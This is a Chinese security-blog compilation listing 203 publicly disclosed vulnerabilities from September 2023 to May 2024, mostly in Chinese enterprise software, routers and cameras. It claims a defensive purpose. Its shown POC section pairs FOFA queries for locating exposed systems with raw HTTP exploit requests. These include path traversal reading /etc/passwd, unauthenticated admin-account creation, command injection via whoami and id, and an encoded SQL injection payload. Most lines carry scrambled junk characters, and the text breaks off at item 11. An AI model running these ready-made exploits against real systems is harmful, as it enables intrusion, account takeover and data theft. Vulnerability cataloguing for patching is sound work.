互联网公开漏洞整理202309-202406
) z0 y) [3 n0 Y" n0 Z) m; W道一安全 2024-06-05 07:41 北京
1 R2 ?! ~0 O7 ~" w& H2 Z& {$ q以下文章来源于网络安全新视界 ,作者网络安全新视界# n1 A0 r& @! F8 k) o" z0 R
9 j/ |, R. S) K/ ?6 p, @8 t; J发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
+ W" i5 j4 x: ]8 Y; d. D. o% S9 F6 k4 x& _6 G9 o6 {
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
0 s+ ?& F) Y0 C( d9 i/ V
- ] |! o! j7 X( b& _$ N. @安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。( y' h" `8 _% u6 o. e
% N4 C( c4 j C2 h$ E( s
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。- l' g d0 [- x
2 P; @) V X: ~: a" @! f合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
3 w. N$ K& u+ o) X, \, c
+ i1 u* S! n5 L5 y, b+ i, z+ q! ]2 c3 I
1 n8 j0 N% }2 F) ^1 E% \声明8 M( E: i3 D# k1 O( i" W
7 _, o8 ]2 P& h( x6 l* X& p F
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
D2 k. q5 q5 R! C; ^% i$ m/ B$ H& d: `5 R) ^4 {9 u$ J
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
5 `* y1 J" b: ?9 L' n# H
( N. h e' H9 p" }, a0 |, [1 V
6 r3 s" _: k6 q4 O+ {! m5 D6 P/ C& d3 R& U& S
目录
4 T. I2 S/ h! j) ]. E7 B! k$ R4 |% V) w* R0 o: ?
01
n" {/ a2 W. j( ~ _# {! S) }0 I: x& h1 x3 @2 p7 _/ W
1. StarRocks MPP数据库未授权访问
8 H* F6 f5 L% z) L2. Casdoor系统static任意文件读取( m( j5 d8 n/ `& t
3. EasyCVR智能边缘网关 userlist 信息泄漏
: G0 c% U; q \: ~' Z( ?) S4. EasyCVR视频管理平台存在任意用户添加
+ ? N7 h" J; F2 r0 x7 ]5. NUUO NVR 视频存储管理设备远程命令执行
* ^' S2 R/ }) D" D. |. ~* W" B6. 深信服 NGAF 任意文件读取
; u6 i- { S$ l; b: t4 h; w; W7. 鸿运主动安全监控云平台任意文件下载
5 L( H7 }3 o x0 o- u0 x0 }% Q8. 斐讯 Phicomm 路由器RCE* `0 s+ H8 l& Q: V; ?, p1 H9 |
9. 稻壳CMS keyword 未授权SQL注入
& ~3 u' z2 T- ]! R8 `10. 蓝凌EIS智慧协同平台api.aspx任意文件上传 B; B6 w6 c: I0 d8 `% c
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入% j, B! p8 C4 T0 X
12. Jorani < 1.0.2 远程命令执行
& b. \0 p* ~5 F8 I, b' Q3 j13. 红帆iOffice ioFileDown任意文件读取+ ?/ Z6 k' K5 ]% p
14. 华夏ERP(jshERP)敏感信息泄露8 T3 k- E% G* }# e8 m* N1 P' E
15. 华夏ERP getAllList信息泄露
, S0 c) b% _, c, S16. 红帆HFOffice医微云SQL注入5 E0 f% e; M: [. N$ a1 I1 i! L
17. 大华 DSS itcBulletin SQL 注入* R0 k6 Y4 O$ x& N6 Q/ T3 j
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露 c5 V) Y; H& @! E& j! O
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
" ?( X, p3 `; J# P! [20. 大华ICC智能物联综合管理平台任意文件读取: _1 `9 p4 e# i& B
21. 大华ICC智能物联综合管理平台random远程代码执行
) d: a$ u8 ^0 O; }22. 大华ICC智能物联综合管理平台 log4j远程代码执行
5 S" L: ]/ @9 l: ]! W* P23. 大华ICC智能物联综合管理平台 fastjson远程代码执行2 I% G3 _' U0 C" |- V1 }" J! |
24. 用友NC 6.5 accept.jsp任意文件上传
7 n6 K. u' M6 e8 c( @25. 用友NC registerServlet JNDI 远程代码执行; b0 z: H* j, B
26. 用友NC linkVoucher SQL注入 q: A+ G$ f9 i/ P/ ~
27. 用友 NC showcontent SQL注入/ l# a! x6 M" M. k; a" r
28. 用友NC grouptemplet 任意文件上传
9 A) y2 f8 | s: w) O+ `4 i/ F29. 用友NC down/bill SQL注入
; {; [5 O; U7 k' Q) h e C! _30. 用友NC importPml SQL注入2 P* D1 j5 T/ q
31. 用友NC runStateServlet SQL注入9 P# K' R8 K/ x& {4 b6 T
32. 用友NC complainbilldetail SQL注入% e" Q* F! ]$ J: i8 j, h2 R: g
33. 用友NC downTax/download SQL注入
6 G A/ u' N, h/ [1 P) Y, ^34. 用友NC warningDetailInfo接口SQL注入
! D9 b, t/ p6 f! V2 P2 ~& Y& p& w35. 用友NC-Cloud importhttpscer任意文件上传
( e7 z% p6 S, [( d1 A I. Z36. 用友NC-Cloud soapFormat XXE
. m* o: O& h1 U$ q37. 用友NC-Cloud IUpdateService XXE
3 i$ R1 ]9 W- k, j! R) V2 @# r38. 用友U8 Cloud smartweb2.RPC.d XXE
! U2 Y' |# b, V: Z6 e$ K% q39. 用友U8 Cloud RegisterServlet SQL注入! H: V2 m4 Z% d% T
40. 用友U8-Cloud XChangeServlet XXE- L6 @) T5 z4 p- ?7 p0 h4 [6 n
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
8 b0 v: J" q8 |# L7 }42. 用友GRP-U8 SmartUpload01 文件上传- r a0 t0 A; P8 ^$ t1 C8 k
43. 用友GRP-U8 userInfoWeb SQL注入致RCE1 g5 _3 v6 J6 D7 p+ o0 X% w) Z7 q* O
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
u( I- e. W+ O2 |45. 用友GRP-U8 ufgovbank XXE9 a# ?# t; {3 V/ X/ O3 U E
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
9 L, v# M0 P% S47. 用友GRP A++Cloud 政府财务云 任意文件读取& x' _6 V o, d0 s; |6 S
48. 用友U8 CRM swfupload 任意文件上传
9 Y( k7 V6 q3 g* T+ L) w7 n49. 用友U8 CRM系统uploadfile.php接口任意文件上传- E4 H. x- ?) m8 l/ O
50. QDocs Smart School 6.4.1 filterRecords SQL注入
! v% r z1 G" z4 G: O& b% g51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入: j2 M5 Q E* H9 [
52. 泛微E-Office json_common.php sql注入- e# q) e+ a" k- @) \
53. 迪普 DPTech VPN Service 任意文件上传7 c/ ^; y7 U" W \0 m7 J% c l
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
# [9 Q) O8 f$ F# a" d55. 畅捷通T+ getdecallusers信息泄露 f% t9 Y+ z" |3 V, |
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE/ |6 ^8 e9 @. y9 r6 v
57. 畅捷通T+ keyEdit.aspx SQL注入* _! Z" w$ R- d: j, H0 W5 f4 @
58. 畅捷通T+ KeyInfoList.aspx sql注入
! {) X9 F* Z* u: q# g59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行5 G% Z7 I& ?& a) b+ L2 G
60. 百卓Smart管理平台 importexport.php SQL注入
4 q. m6 N" R; o6 m61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
" e3 D$ m. g* ?1 Y62. IP-guard WebServer 远程命令执行. {* S' ]! B- N' v9 `* |1 e. _& y
63. IP-guard WebServer任意文件读取2 G% g% Z, T6 D6 ~
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
( R) u" X7 n6 ~8 G2 B! I& `65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
7 j" m3 ~& O4 E66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
* [% q, G3 W/ \4 O67. 万户ezOFFICE wpsservlet任意文件上传- o% b0 n# N, b0 I
68. 万户ezOFFICE wf_printnum.jsp SQL注入9 _$ k6 G/ z+ S8 T( v% k7 X
69. 万户 ezOFFICE contract_gd.jsp SQL注入
, [* y$ y0 u. W: Q$ e* D9 M70. 万户ezEIP success 命令执行# w4 x6 r' ?! {. ]* y
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
$ g6 y3 b5 D4 }, y R( X) M72. 致远OA getAjaxDataServlet XXE4 d$ j6 q! ?8 h& L9 e
73. GeoServer wms远程代码执行5 s% z8 ? ^ ]( x7 d
74. 致远M3-server 6_1sp1 反序列化RCE
- o' |- O. ^: P1 ^1 ]" N5 L7 }+ R. P75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
$ c) ]* Y9 E, Z T4 m' s; M1 S3 m76. 新开普掌上校园服务管理平台service.action远程命令执行5 d! {+ u: z/ V$ h6 y
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
5 O3 p( L# Y/ R8 u: A2 K; a3 v78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传5 m! f. b8 [4 g* b* Y
79. BYTEVALUE 百为流控路由器远程命令执行
% q; x1 H4 B: |5 z: I0 f1 F80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传6 S1 O& F; g, C! I
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
- i+ V& H: Y& V7 a1 v82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
, ^' K- R: B0 k! u, x- y83. JeecgBoot testConnection 远程命令执行
4 e- Z# f1 ]5 G7 Y6 R1 G84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
; c" H) k7 O9 R! j" i% Q" V85. SysAid On-premise< 23.3.36远程代码执行
+ l) |( f) h- I" v86. 日本tosei自助洗衣机RCE
; v( R( B" S! e' J87. 安恒明御安全网关aaa_local_web_preview文件上传 C" p4 c/ |& y# q3 V- v
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
/ @) l6 Z I( s' m+ t89. 致远互联FE协作办公平台editflow_manager存在sql注入. r: M0 Q u% r3 |4 ]% M, s$ J
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
- h% m0 f0 x( k+ v1 E91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取2 x7 R. X/ S0 I3 D4 w& Q, q, i
92. 海康威视运行管理中心session命令执行) z1 b# G. C; |+ l$ p" K
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传, J: T$ S& X/ n% h
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
! @: `2 c1 O( y! ]95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行, }, N* Q1 G7 X& {7 E$ _
96. Apache OFBiz 18.12.11 groovy 远程代码执行
, B3 b' |9 g3 o! @97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行 H+ j8 I( C/ ~2 k Z
98. SpiderFlow爬虫平台远程命令执行
5 [8 `9 {2 _: n* i9 Z1 }2 J/ X99. Ncast盈可视高清智能录播系统busiFacade RCE
& q/ x' [1 u- e6 u) k% Z100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
/ k& I3 O0 a" E- v0 v$ s, `101. ivanti policy secure-22.6命令注入
4 u K M9 B$ G# v# q& b, X" ?5 H& d102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行& M2 D+ E1 m* l8 A
103. Ivanti Pulse Connect Secure VPN XXE6 F$ A% o' p4 P7 E- ?# }
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露' p* U- E0 q6 T% m7 z
105. SpringBlade v3.2.0 export-user SQL 注入- l( z, y) ~+ j- B7 z
106. SpringBlade dict-biz/list SQL 注入1 s% u2 ~! F( f0 o+ t
107. SpringBlade tenant/list SQL 注入
0 ^3 g( m# `# F/ n( B# `108. D-Tale 3.9.0 SSRF
% Y6 m5 _; r5 K" h$ F0 X1 S109. Jenkins CLI 任意文件读取% o( E2 C6 C+ Z0 u4 y1 C/ N
110. Goanywhere MFT 未授权创建管理员
9 k8 `( L; Z6 R& X4 q111. WordPress Plugin HTML5 Video Player SQL注入
5 |1 h; \! Y% j) f6 M% c112. WordPress Plugin NotificationX SQL 注入
0 t5 q( R+ H9 } m+ u. x0 w113. WordPress Automatic 插件任意文件下载和SSRF! o) d- o* [6 p
114. WordPress MasterStudy LMS插件 SQL注入$ [! u s- Q( ~" H9 o
115. WordPress Bricks Builder <= 1.9.6 RCE
. v# u) F, _5 i. z9 g+ o2 q116. wordpress js-support-ticket文件上传
9 e+ n: v' `+ ]$ u117. WordPress LayerSlider插件SQL注入
! H' d! }# p \- S118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
6 h; a2 q$ y, X s+ r; a X' j# t7 Q+ ?119. 北京百绰智能S20后台sysmanageajax.php sql注入6 c/ m, p. b2 w; _# r9 \
120. 北京百绰智能S40管理平台导入web.php任意文件上传
2 ?9 R2 Q8 r- a4 e1 p( _, ?* S121. 北京百绰智能S42管理平台userattestation.php任意文件上传; }; C# p D9 X9 ~1 Y6 `/ M
122. 北京百绰智能s200管理平台/importexport.php sql注入3 s F0 K: o( p0 M) U
123. Atlassian Confluence 模板注入代码执行! u& J5 B" E3 v }+ I
124. 湖南建研工程质量检测系统任意文件上传
! X/ D3 `1 R) j125. ConnectWise ScreenConnect身份验证绕过4 O& m4 Y4 d7 q" g- c& C; ~9 e- [
126. Aiohttp 路径遍历% y& V0 |# E2 W* K6 H5 S
127. 广联达Linkworks DataExchange.ashx XXE0 M, \% p- Z4 ~9 @- ~
128. Adobe ColdFusion 反序列化' w7 d6 U4 ]. [- Q9 ]! a& V
129. Adobe ColdFusion 任意文件读取! l9 b& ~7 b# N& p
130. Laykefu客服系统任意文件上传
8 P& l! {0 L; Q5 Z131. Mini-Tmall <=20231017 SQL注入: e: l4 i: J) O
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
8 H5 a. E. p# _! D" n! @0 T, ?- [; G133. H5 云商城 file.php 文件上传. G* q& c' }; a+ t+ D5 K5 A" e9 c9 I
134. 网康NS-ASG应用安全网关index.php sql注入! t p" a" ~: y; d0 B4 x
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
) v. [% _8 }1 y136. NextChat cors SSRF5 Z, p, w9 i6 W {
137. 福建科立迅通信指挥调度平台down_file.php sql注入. o t% Q& V/ C8 m' z
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入: [+ `2 w/ C6 H$ }* v. O2 C! n. q) R$ m
139. 福建科立讯通信指挥调度平台editemedia.php sql注入3 `$ S2 d8 v# }* ~3 Y
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
) i! `6 B0 K3 [# J* j" A. \141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
; }0 |1 ^( p, E3 j0 V) C; @" }142. CMSV6车辆监控平台系统中存在弱密码
: P" F/ c4 l& H# }4 `, V" W) F1 I143. Netis WF2780 v2.1.40144 远程命令执行
% b( x1 P6 k0 Q/ I" x144. D-Link nas_sharing.cgi 命令注入
) w$ o) m* N5 v4 X5 X3 j145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
; P$ Z6 x: d/ {% X6 u146. MajorDoMo thumb.php 未授权远程代码执行' `$ k9 P! R2 E) P
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
) b1 j8 J0 m3 X. _/ s148. CrushFTP 认证绕过模板注入$ Y! L! _/ i; D; V1 c" X
149. AJ-Report开源数据大屏存在远程命令执行& t8 b9 r0 a4 i
150. AJ-Report 1.4.0 认证绕过与远程代码执行2 c, t" k9 i( ?6 L9 q; R
151. AJ-Report 1.4.1 pageList sql注入
. }& c. o9 V0 b3 m% x! i152. Progress Kemp LoadMaster 远程命令执行
i4 z( Q4 b/ T7 r/ g' S5 t5 M6 B153. gradio任意文件读取
) n! x5 Z8 v7 `/ q, [154. 天维尔消防救援作战调度平台 SQL注入
3 N& V& d" n- f155. 六零导航页 file.php 任意文件上传 r* q+ [+ I V: q& \9 A
156. TBK DVR-4104/DVR-4216 操作系统命令注入- K$ K' Y& e( h
157. 美特CRM upload.jsp 任意文件上传
4 ]% y3 Q h, ]3 [1 ?- v! e7 _7 ?158. Mura-CMS-processAsyncObject存在SQL注入3 M- l- B$ F7 A
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
' v6 ~+ _0 P2 T* f2 H160. Sonatype Nexus Repository 3目录遍历与文件读取2 V) e, `' L" ? V& y
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
( j" R1 ?0 V2 {162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传# v6 s$ D! a) ]" a }# b1 e* l
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传5 q6 P4 [. b# b
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传* G# G8 y- @, f
165. OrangeHRM 3.3.3 SQL 注入
5 j9 D* C$ P f166. 中成科信票务管理平台SeatMapHandler SQL注入
9 a) a% q7 c2 n% q, r167. 精益价值管理系统 DownLoad.aspx任意文件读取8 Z! z2 z6 y2 n8 d! W
168. 宏景EHR OutputCode 任意文件读取
* O* f1 N" P: }% t4 @- C169. 宏景EHR downlawbase SQL注入4 ~7 n0 g0 g8 t
170. 宏景EHR DisplayExcelCustomReport 任意文件读取$ M9 [ y4 W0 C! ]) j3 ]
171. 通天星CMSV6车载定位监控平台 SQL注入
. F% F0 l5 Z: F9 |3 Q5 o172. DT-高清车牌识别摄像机任意文件读取
7 U; |9 r6 D3 j; k2 G173. Check Point 安全网关任意文件读取* j( [. u: E. l7 B9 o
174. 金和OA C6 FileDownLoad.aspx 任意文件读取/ z& r; m4 H# d# n* \3 b v- n' J
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入$ B0 @- z! r: o& I" h Y7 `
176. 电信网关配置管理系统 rewrite.php 文件上传
$ _2 R' ^) Y1 b( k$ Y0 f" l177. H3C路由器敏感信息泄露6 F8 N) w, R' H8 V% X7 t9 }
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
. S8 Q3 M9 ~0 {5 f179. 建文工程管理系统存在任意文件读取
; g( |" e) D0 F180. 帮管客 CRM jiliyu SQL注入' p* Z' X0 v8 @ e# `
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
3 q2 Z- f q1 l' b182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
' W+ x* R8 A6 O5 `! J183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
7 |+ R8 S9 r. @; p+ `184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
5 g: L; p _- x% W7 {0 r& F( W185. 瑞友天翼应用虚拟化系统SQL注入
) q% b: Y- `$ b' ]7 x) M186. F-logic DataCube3 SQL注入% x# Q1 i2 \$ S# u" Q0 I: _3 i
187. Mura CMS processAsyncObject SQL注入. @ M; U5 A, E; T" u; C8 m- d
188. 叁体-佳会视频会议 attachment 任意文件读取
( n0 ?8 v/ X9 X5 J4 ~189. 蓝网科技临床浏览系统 deleteStudy SQL注入2 Z5 V4 }6 v. f
190. 短视频矩阵营销系统 poihuoqu 任意文件读取" Y: R3 Z+ \$ H: G$ n& `7 f
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入6 w3 Y# R! B$ J# t' T" p
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
8 z7 t5 k2 c; t3 n: l4 m8 g& ~6 J5 d193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
# N8 s- a) r3 I# k' Y% h194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
6 K3 R$ t4 G, ^0 M3 F) `0 X( h195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
9 A" v4 t7 z$ x% z* @196. 河南省风速科技统一认证平台密码重置
* ?3 \+ |" O% x( G9 i197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入# ^1 I2 r6 n2 f: @$ f" Y7 u! F
198. 阿里云盘 WebDAV 命令注入0 z/ p' C3 ]$ c; G
199. cockpit系统assetsmanager_upload接口 文件上传
9 z& V' p( n4 b; f1 {# X: }200. SeaCMS海洋影视管理系统dmku SQL注入
, n4 k/ x) [! P& s$ Q4 x201. 方正全媒体新闻采编系统 binary SQL注入
. e1 p. R6 r* u' f% x: g) Q202. 微擎系统 AccountEdit任意文件上传) T) w2 H/ R; Q1 n4 U3 I' a
203. 红海云EHR PtFjk 文件上传
3 S) P7 w) V$ w
! T* _5 ~ _, I. p* e( ^$ `4 X/ d) pPOC列表
: }& J) r' G: Z# e3 D- X
, s1 s& c( G6 E; S* l029 B/ N) v- J/ Y; l( a5 P
( q$ i6 E" f+ `' L9 ]+ ?' \6 p2 X
1. StarRocks MPP数据库未授权访问
9 ]) p9 T7 c" j1 O AFOFA :title="StarRocks"
7 \! P( A. o' U6 l2 hGET /mem_tracker HTTP/1.1
# U0 z @, C3 s- F! P9 UHost: URL) y1 A7 z/ ~ l L( a
- U" g3 |7 Q& {
3 Z7 T- O1 }5 A3 T6 O& W" W2. Casdoor系统static任意文件读取
6 K2 W6 O( i8 yFOFA :title="Casdoor"
9 M+ |' ] G* M0 qGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
% h+ K$ o* L/ P0 j4 `2 \Host: xx.xx.xx.xx:9999
8 h, h; ^& ?$ EUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, n2 y( T+ I, y9 v, V8 {Connection: close0 G8 Z$ G7 }5 c1 ^0 U* K' d, |
Accept: */*
7 T( Q( D) w# \1 oAccept-Language: en3 }, e' Y9 k6 }& ~! ~$ P+ S7 |
Accept-Encoding: gzip; S0 a$ R0 @8 Y% h) m5 m7 ^
) g5 M3 i2 g& x3 i
! T! B0 I/ b1 i4 \
3. EasyCVR智能边缘网关 userlist 信息泄漏; e/ z' f; Z2 {/ s
FOFA :title="EasyCVR"
4 m/ W5 p* x* p% j* x" g0 [GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1' h6 V: ~ |! m: M
Host: xx.xx.xx.xx
, I. r( B% y; @/ e& E
4 u4 H- e; ?) p% G* S$ o& Y! h; p1 E) y" g( {9 S0 B
4. EasyCVR视频管理平台存在任意用户添加" h3 ~) c( e1 ]+ ~* D+ [
FOFA :title="EasyCVR". j: V$ y: K) g w8 n
( i2 w+ F8 ]( z3 D
password更改为自己的密码md5
7 s( ^1 i; L( }) MPOST /api/v1/adduser HTTP/1.18 r# g8 n, F) l# H
Host: your-ip
3 r% C7 V) i0 L' t- P0 xContent-Type: application/x-www-form-urlencoded; charset=UTF-8
0 C- A- a# }% O' |6 z! M0 y7 A \0 O' L. |; U. [2 N
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1' [2 N6 i0 C6 \( H9 t; c
5 g$ [- M& J p' k9 C
4 b8 E( [. S# z. N/ I+ O5. NUUO NVR 视频存储管理设备远程命令执行, Y: H2 Q/ C% c+ d* @: e
FOFA:title="Network Video Recorder Login" p% `) Y- s! V6 m# e D
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
: e9 m$ t7 p, x: B: dHost: xx.xx.xx.xx
. p; N) E* q; s) Y2 l, R& T: @! @" }6 L8 w. m) m
8 W C+ `+ \- s. ?" \, t7 e7 \
6. 深信服 NGAF 任意文件读取6 G1 m B2 J |' p& l8 {5 k" C
FOFA:title="SANGFOR | NGAF"
5 [, H1 A9 j" |4 ?& b# w* @3 oGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
0 | X& G0 i2 q! M6 r/ T0 `8 \Host:* a Y/ r; E7 Q8 U( V9 A. T
2 q8 Y/ q1 m% r3 I
4 \( ~& t, j" I7 V3 u; _1 Y5 i8 }7. 鸿运主动安全监控云平台任意文件下载 G6 {, m! ~- M0 S' W
FOFA:body="./open/webApi.html"
/ R6 q5 m/ _% O) q# WGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1# D$ q* z5 v4 x; Y9 z6 U
Host:: f' c; T9 k5 W% T9 j% X
4 i ]& V( L# z3 @6 g. Z& M5 e& O0 H# N
9 T1 P& i5 p' j8 w! ?8. 斐讯 Phicomm 路由器RCE
$ k( w) O X& n2 F3 L6 GFOFA:icon_hash="-1344736688"4 w v0 N/ C9 ~- A
默认账号admin登录后台后,执行操作
6 M5 v7 A- N- a# _POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1; {3 P" F8 J3 W3 [. a6 k M9 C
Host: x.x.x.x
/ l0 s6 F1 e1 h% U2 d8 I; ~/ YCookie: sysauth=第一步登录获取的cookie. Z, U2 {& ^! W0 p y K' q8 o
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
7 H0 w2 M, e$ @% y* C5 H$ _$ {7 Q9 zUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36, w* }4 H0 |) @
* h( b* K$ q; T: e7 ~6 y------WebKitFormBoundaryxbgjoytz4 O/ y7 ]2 [4 x* h. ?; B
Content-Disposition: form-data; name="wifiRebootEnablestatus": h" f, b0 o+ n1 m1 c( i
9 \2 f8 F: r" z8 u$ t' m%s: ? J: p. C) L4 M* K$ P% Y
------WebKitFormBoundaryxbgjoytz
/ ]& O6 i9 {# v1 p5 W* oContent-Disposition: form-data; name="wifiRebootrange"/ Z9 ~3 j/ G, L( b& I( X) f
: y: h! W" p( H& I& [+ B12:00; id;% l1 u h+ j, v! T# g
------WebKitFormBoundaryxbgjoytz
$ k3 i4 D1 `3 d4 o d9 Z$ DContent-Disposition: form-data; name="wifiRebootendrange"
, I& X; z8 x2 |# c
) `) g6 V# D! o8 X# w& D6 [2 c%s: i2 c/ y! g/ F
------WebKitFormBoundaryxbgjoytz% c ]9 F# S$ w1 \& |
Content-Disposition: form-data; name="cururl2"5 q7 z. v3 m1 L4 m
. n' A, n& w3 Z7 k' A
{. ~: i4 `8 l; A; k* R
------WebKitFormBoundaryxbgjoytz--" r5 J+ o. v) J7 R. K& i
1 X L7 F3 r/ h- t) ~ l
; X" L8 _: b1 N% O
9. 稻壳CMS keyword 未授权SQL注入 {: y3 D+ `( U; T( S$ `
FOFA:app="Doccms"! b8 K4 L3 D! q2 a. x% N2 x
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1# U8 K# {% Y5 s
Host: x.x.x.x" g4 h) m' M( G2 j; X
0 F- l9 _& c# j& |2 z9 K
8 Y. x2 {* k7 v( ?' F" M) ]payload为下列语句的二次Url编码* h+ ^6 J* u& c3 x8 n) b* A
7 r0 J Y- J. C# I; u
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#. a- u/ |: |8 S5 T. {4 C" @# Q
( t/ v; q1 J( c
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
# I8 y$ Q# M! YFOFA:icon_hash="953405444"4 d% m) {6 {: A& l" e$ Z3 p
$ @) A" k' W& ]. x0 G
文件上传后响应中包含上传文件的路径( t3 |- X9 N3 X1 j ?3 n: S
POST /eis/service/api.aspx?action=saveImg HTTP/1.1/ u5 l' `. k# v* @: i+ o! U2 ?
Host: x.x.x.x:xx4 b# c2 j6 m6 X; \( W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.365 \/ U1 T3 R7 G/ I8 n, ]% }
Content-Length: 197* F: q' x$ w$ M- ^! I. t' d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- N. Q0 @" w$ r" Z4 T9 @- OAccept-Encoding: gzip, deflate
6 \+ Q6 z( B7 Y u" N6 HAccept-Language: zh-CN,zh;q=0.93 t' {% i7 B% r
Connection: close# T4 o7 r5 K4 O8 \/ X" `6 ^- U9 A% Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
+ v5 W$ J5 J+ }; u0 y4 C" S- [' F
) Y& t0 U& ^% H: {------WebKitFormBoundaryxdgaqmqu
1 ]- ~9 R, y5 o5 Z7 TContent-Disposition: form-data; name="file"filename="icfitnya.txt"9 z. g1 Y$ o5 `+ |+ {, M3 O
Content-Type: text/html# e! q5 G1 z4 }' j9 @
0 X$ c; J/ t' a* ]# Q
jmnqjfdsupxgfidopeixbgsxbf
, K$ N E, E W4 t& L------WebKitFormBoundaryxdgaqmqu--4 D/ L9 ^: A1 e0 S0 }
; ]( h; c: f, w* d8 x" S+ Y- L- n
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入; g3 q, p' K* U" j3 D. O) c: O# @
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
